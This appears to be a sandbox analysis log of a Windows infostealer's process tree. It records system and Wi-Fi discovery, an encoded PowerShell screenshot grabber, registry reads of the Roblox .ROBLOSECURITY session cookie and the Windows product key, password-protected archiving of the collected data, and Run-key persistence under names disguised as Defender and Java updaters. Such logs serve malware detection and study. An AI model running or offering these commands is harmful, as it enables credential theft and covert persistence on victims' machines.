        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        26⤵
        
        PID:4812
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        27⤵
        Enumerates processes with tasklist
        
        PID:3216
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        26⤵
        
        PID:5992
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        27⤵
        
        PID:1940
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        26⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5932
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        27⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2916
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        26⤵
        
        PID:4700
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        27⤵
        Gathers system information
        
        PID:5756
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        26⤵
        
        PID:4352
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:5960
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        27⤵
        
        PID:4384
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        26⤵
        
        PID:1516
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:2820
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        27⤵
        
        PID:5732
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ip4payln\ip4payln.cmdline"
        28⤵
        
        PID:5312
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3A5F.tmp" "c:\Users\Admin\AppData\Local\Temp\ip4payln\CSCC785AF7DB90494D98D9F667C22783AD.TMP"
        29⤵
        
        PID:5876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        26⤵
        
        PID:2564
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        27⤵
        
        PID:3660
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        26⤵
        
        PID:4728
        
        C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        27⤵
        Views/modifies file attributes
        
        PID:6120
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        26⤵
        
        PID:4920
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        27⤵
        
        PID:4496
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        26⤵
        
        PID:4416
        
        C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        27⤵
        Views/modifies file attributes
        
        PID:5816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        26⤵
        
        PID:1220
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        27⤵
        
        PID:3332
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        26⤵
        
        PID:2868
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:5320
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        27⤵
        Enumerates processes with tasklist
        
        PID:5528
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        26⤵
        
        PID:5176
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        27⤵
        
        PID:5916
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        26⤵
        
        PID:3704
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        27⤵
        
        PID:5388
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        26⤵
        
        PID:5712
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:5720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4352
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        26⤵
        
        PID:3396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        27⤵
        
        PID:4732
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        26⤵
        
        PID:4912
        
        C:\Windows\system32\getmac.exe
        
        getmac
        27⤵
        
        PID:3496
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI57682\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\c42z4.zip" *"
        26⤵
        
        PID:4804
        
        C:\Users\Admin\AppData\Local\Temp\_MEI57682\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI57682\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\c42z4.zip" *
        27⤵
        
        PID:2756
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        26⤵
        
        PID:1244
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        27⤵
        
        PID:5688
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        26⤵
        
        PID:5812
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        27⤵
        
        PID:5304
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        26⤵
        
        PID:2012
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        26⤵
        
        PID:3216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4284
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        26⤵
        
        PID:3872
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        27⤵
        Detects videocard installed
        
        PID:5872
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        26⤵
        
        PID:4148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        27⤵
        
        PID:5156
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        24⤵
        
        PID:4940
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        24⤵
        
        PID:1916
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\28CB.tmp\28CC.tmp\28CD.bat C:\Windows\system32\java.exe"
        25⤵
        
        PID:5332
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        26⤵
        Delays execution with timeout.exe
        
        PID:5960
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        26⤵
        
        PID:5644
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        26⤵
        
        PID:5576
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        26⤵
        
        PID:2584
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        26⤵
        
        PID:3424
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        26⤵
        
        PID:5212
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        27⤵
        
        PID:5952
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        26⤵
        
        PID:704
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        26⤵
        
        PID:1112
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3167.tmp\3168.tmp\3169.bat C:\Windows\system32\java.exe"
        27⤵
        
        PID:3844
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        28⤵
        Delays execution with timeout.exe
        
        PID:328
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        28⤵
        
        PID:2528
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        28⤵
        
        PID:5576
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        28⤵
        
        PID:4804
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        28⤵
        
        PID:5420
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        28⤵
        
        PID:5356
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        29⤵
        
        PID:3148
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        28⤵
        
        PID:3036
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        28⤵
        
        PID:3804
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3B2B.tmp\3B2C.tmp\3B2D.bat C:\Windows\system32\java.exe"
        29⤵
        
        PID:2564
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        30⤵
        Delays execution with timeout.exe
        
        PID:1948
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        30⤵
        
        PID:5744
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        30⤵
        
        PID:4200
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        30⤵
        
        PID:5172
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        30⤵
        
        PID:2704
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        30⤵
        
        PID:2916
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        31⤵
        
        PID:5408
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        30⤵
        
        PID:4636
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        30⤵
        
        PID:4436
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\40A9.tmp\40AA.tmp\40AB.bat C:\Windows\system32\java.exe"
        31⤵
        
        PID:1840
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        32⤵
        Delays execution with timeout.exe
        
        PID:5312
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        32⤵
        
        PID:5368
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        32⤵
        
        PID:4980
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        32⤵
        
        PID:2084
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        32⤵
        
        PID:704
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        32⤵
        
        PID:5056
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        33⤵
        
        PID:4660
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        32⤵
        
        PID:492
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        32⤵
        
        PID:3192
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\577D.tmp\577E.tmp\577F.bat C:\Windows\system32\java.exe"
        33⤵
        
        PID:4908
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        34⤵
